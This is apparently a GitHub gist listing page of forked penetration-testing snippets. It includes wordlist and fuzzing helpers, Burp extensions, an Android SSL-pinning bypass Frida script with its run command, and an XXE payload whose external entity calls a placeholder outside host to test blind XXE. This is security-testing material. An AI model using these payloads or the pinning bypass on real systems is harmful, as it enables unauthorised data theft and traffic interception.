Pentesting-Exploitation Programs and Commands , Protocols Network / Ports
MisterHuntz chanpu9
chanpu9
/ txt_to_postman_b64_json.py
Created
October 20, 2024 11:01
— forked from DanaEpp/txt_to_postman_b64_json.py
A simple Python script that will convert and encode a Big List of Naughty Strings (BLNS) into a JSON file that Postman can use
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from argparse import ArgumentParser, Namespace | |
| import os | |
| import base64 | |
| import json | |
| def main(srcFile: str, dstFile:str) -> None: | |
| if not os.path.isfile(srcFile): |
chanpu9
/ encryption.js
Created
November 6, 2023 13:12
— forked from vlucas/encryption.ts
Stronger Encryption and Decryption in Node.js
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'use strict'; | |
| const crypto = require('crypto'); | |
| const ENCRYPTION_KEY = process.env.ENCRYPTION_KEY; // Must be 256 bits (32 characters) | |
| const IV_LENGTH = 16; // For AES, this is always 16 | |
| function encrypt(text) { | |
| let iv = crypto.randomBytes(IV_LENGTH); | |
| let cipher = crypto.createCipheriv('aes-256-cbc', Buffer.from(ENCRYPTION_KEY), iv); |
chanpu9
/ waybackurls.py
Created
August 24, 2023 08:42
— forked from mhmdiaa/waybackurls.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
chanpu9
/ waybackrobots.py
Created
August 24, 2023 08:42
— forked from mhmdiaa/waybackrobots.py
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| import sys | |
| from multiprocessing.dummy import Pool | |
| def robots(host): | |
| r = requests.get( | |
| 'https://web.archive.org/cdx/search/cdx\ | |
| ?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host) |
chanpu9
/ BurpExtender.java
Created
February 11, 2023 10:36
— forked from olliewuk/BurpExtender.java
PROTOTYPE PortSwigger Burp extension which loads a Yaml file containing regular expressions for sensitive information in order to automatically identify and flag
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // | |
| // PROTOTYPE Passive Sensitive Information Observer | |
| // | |
| // test with https://ginandjuice.shop/ | |
| // | |
| // This has been tested with Burp Suite Pro to trial the concept. | |
| // | |
| // Ollie Whitehouse - @ollieatnowhere | |
| // |
chanpu9
/ List of API endpoints & objects
Created
February 6, 2023 11:02
— forked from yassineaboukir/List of API endpoints & objects
A list of 3203 common API endpoints and objects designed for fuzzing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
chanpu9
/ BurpExtender.java
Created
February 1, 2023 11:22
— forked from olliewuk/BurpExtender.java
PROTOTYPE Google Safe Browsing URL Reputation Burp Suite scanner extension
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // | |
| // | |
| // PROTOTYPE Google Safe Browsing URL Reputation Burp Suite scanner extension | |
| // | |
| // The concept is that organisations will want to use Burp Suite Enterprise edition | |
| // to continually scan their websites to see if they include / reference any known | |
| // malicious URLs i.e. they have latterly breached etc.. This is a prototype of this | |
| // concept using an extension and the Google Safe Browsing API. | |
| // | |
| // You need a API key from Google, details on how to obtain one can be found here |
chanpu9
/ frida_multiple_unpinning.js
Created
October 24, 2022 17:04
— forked from akabe1/frida_multiple_unpinning.js
Another Android ssl certificate pinning bypass for various methods
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Android ssl certificate pinning bypass script for various methods | |
| by Maurizio Siddu | |
| Run with: | |
| frida -U -f [APP_ID] -l frida_multiple_unpinning.js --no-pause | |
| */ | |
| setTimeout(function() { | |
| Java.perform(function() { | |
| console.log(''); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
chanpu9
/ Exploitation.md
Created
July 24, 2022 10:20
— forked from yezz123/Exploitation.md
Pentesting-Exploitation
NewerOlder